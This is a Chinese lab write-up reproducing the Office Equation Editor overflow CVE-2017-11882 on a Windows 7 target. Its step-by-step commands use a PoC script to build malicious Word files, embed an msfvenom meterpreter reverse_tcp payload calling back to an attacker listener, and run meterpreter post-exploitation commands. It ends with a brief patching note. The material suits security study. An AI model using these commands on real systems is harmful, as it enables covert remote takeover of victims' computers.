|
1、漏洞概述
windows下常用软件,office必定属于前列,所以找到往年的这个漏洞,复现一下。微软Office套件据网上说,最有效的攻击手段,是基于CVE-2017-11882的漏洞利用。
这个漏洞有大的关注度,从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的构建非常简单,姿势又非常“优雅”。例如,有些攻击效果会出现弹框,会出现CPU飙高,会发生异常等等,而这个漏洞的利用效果,堪称“无色无味”。
此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
使用场景,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。
2、影响版本:
office 2003 office 2007 office 2010 office 2013 office 2016
3、漏洞复现环境
parrot4.0 + Windows7 + Office 2016 渗透机:parrot + POC代码【上述github地址】 靶机:Win7 + Office 2016
4、实验流程
4.1、下载office 2016
在靶机win7中,安装完可看到office套件。
4.2、从Git上下载poc代码
4.3、使用下载的poc生成带有代码的word
4.3.1、 生成调用计算器的程序
python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o 11882.doc
4.3.2、 生成调用任务管理的程序
python CVE-2017-11882.py -c "cmd.exe /c taskmgr.exe" -o 11882-2.doc
通过上面生成的word文件,用office打开后,可以弹出上面我们生成的指定程序,由于Office2016存在CVE-2017-11882漏洞,当打开特殊构造的word文件时,windows会执行其他动作。既然此漏洞能够造成win系统执行其他动作,那么,是否顺便可以反弹会话,直接被渗透机控制呢?答案是肯定的。接下来我们来做进一步的验证。
4.3.3、构造带有shell后门的word文件,并开启监听
生成一些shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.111.136 LPORT=4444 -o ./sc.bin 产生漏洞 python CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.doc
使用parrot的msf实现监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.111.136
exploit
此后便可以通过meterpreter来对会话进行管理:
进入会话 msf exploit(CVE-2017-11882) > sessions 1 查看系统信息 meterpreter > sysinfo 查看当前用户 meterpreter > getuid 截屏 meterpreter > screenshot
5、漏洞修复
①在线更新;开启Windows Update更新,这种方式对于大部分人来说就够了。
|